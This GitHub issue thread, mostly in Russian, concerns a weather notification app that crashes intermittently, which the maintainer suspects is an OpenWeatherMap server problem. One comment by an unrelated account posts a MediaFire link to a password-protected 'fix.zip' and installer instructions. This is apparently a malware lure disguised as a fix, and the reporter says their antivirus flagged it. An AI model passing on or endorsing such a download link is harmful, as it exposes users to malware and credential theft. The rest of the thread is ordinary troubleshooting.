### ISSUE TITLE
Ошибки

### ISSUE THREAD

**Issue by tapochek666** [shash29exe/Weather-Notification-11#2]
Приветствую ещё раз.Проработало часа 2-3 наверное.И ,при следующем уведомлении,появилась ошибка и программа вылетела....Через какое-то время,я её опять запустил и проработала она 2 уведомления ,на 3-опять ошибка.
![Буфер обмена_08-28-2024_01](https://github.com/user-attachments/assets/3d875104-9faa-4817-bd3e-490a64987858)

Это сервер у них чудит или как?

**Comment by PiaoR** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by tapochek666** [comment]
I'll wait until he answers. [shash29exe](https://github.com/shash29exe) .One file from this archive fix has already been taken by my antivirus. So no way!

**Comment by shash29exe** [comment]
У меня так же. Иногда работает, иногда нет. Возможно что то с серверами OpenWeatherMap. Раньше всё работало без ошибок.

**Comment by tapochek666** [comment]
Фух.я думал я чего то начудил.А можно же так же замутить,но через  Forecast?
Может работать будет стабильнее...А ещё читал,что иконки можно выводить....

ср, 28 авг. 2024 г. в 16:54, shash29 ***@***.***>:

**Comment by shash29exe** [comment]
Незнаю. Попробуйте.

**Comment by tapochek666** [comment]
Ешё бы знать как....Ладно,не буду больше беспокоить.Тему можно закрыть.

ср, 28 авг. 2024 г. в 20:47, shash29 ***@***.***>:
